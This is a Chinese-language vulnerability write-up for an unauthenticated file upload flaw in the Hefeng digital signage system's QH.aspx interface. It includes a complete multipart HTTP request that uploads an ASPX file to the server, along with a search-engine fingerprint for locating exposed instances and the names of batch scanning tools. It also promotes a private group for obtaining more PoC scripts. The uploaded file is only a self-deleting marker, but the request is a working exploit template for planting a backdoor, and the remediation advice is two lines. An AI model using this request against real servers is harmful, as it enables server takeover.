0x01 产品简介

和丰多媒体信息发布系统也称数字标牌（Digital Signage），是指通过大屏幕终端显示设备，发布商业、财经和娱乐信息的多媒体专业视听系统，常被称为除纸张媒体、电台、电视、互联网之外的“第五媒体”。该系统基于Web的全B/S先进架构，支持大用户数、大并发数及权限管理，可以同时连接数千、上万个播放终端。

0x02 漏洞概述

和丰多媒体信息发布系统 QH.aspx 接口存在文件上传漏洞，未经身份验证的远程攻击者可利用此漏洞上传任意后门文件，执行恶意指令，从而获取服务器权限。

0x03 搜索引擎

app="和丰山海-数字标牌"

0x04 漏洞复现

POST /QH.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr
 
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="fileToUpload"; filename="qwe.aspx"
Content-Type: application/octet-stream
 
<%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="action"
 
upload
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="responderId"
 
ResourceNewResponder
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="remotePath"
 
/opt/resources
------WebKitFormBoundaryhbcZX7o0Hw19h3kr--

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子

0x06 修复建议

关闭互联网暴露面或接口设置访问权限
升级至安全版本